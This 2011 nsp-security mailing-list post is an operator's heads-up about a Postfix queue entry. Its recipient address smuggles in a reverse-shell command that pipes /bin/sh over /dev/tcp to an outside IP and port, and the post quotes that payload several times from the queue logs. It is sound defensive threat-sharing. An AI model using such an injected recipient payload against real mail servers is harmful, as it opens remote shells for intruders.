[nsp-sec] Something odd in the mail queue. AS30496
Scott A. McIntyre
scott at howyagoin.net
Wed Feb 2 20:45:28 EST 2011
Hi teams,
I happened to look at my mail queue today and noticed the following item
sitting there:
-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
C28E16089 367 Tue Feb 1 00:59:58 blue at dick.com
(temporary failure)
"root+:|exec /bin/sh
0</dev/tcp/72.249.152.50/45295 1>&0 2>&0"@mymailserver.com
Looking at the actual postfix queue item:
original_recipient="root+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295
1>&0 2>&0"
And:
log_client_address=216.104.47.74A
log_client_port=45738
log_helo_name=bluedick
log_protocol_name=SMTP
client_name=unknown
reverse_client_name=74.47.104.216.no-rdns.ord02.singlehop.net
dsn_orig_rcpt=rfc822;root+:"|exec /bin/sh 0</dev/tcp/72.249.152.50/45295
1>&0 2>&0"O<root+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295 1>&0
2>&0RLroot+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295 1>&0
2>&0 at mymailserver.com
So, on a whim, I poked at the server:
$ telnet 72.249.152.50 45295
Trying 72.249.152.50...
Connected to 72.249.152.50.
Escape character is '^]'.
Error! :-))s
At least one other person in our community has ACK'd seeing this (on
IRC) so I thought I'd pass it along for others.
Heads up to:
AS | IP | AS Name
30496 | 72.249.152.50 | COLO4 - Colo4Dallas LP
Cheers,
Scott A. McIntyre
Telstra AS1221
More information about the nsp-security
mailing list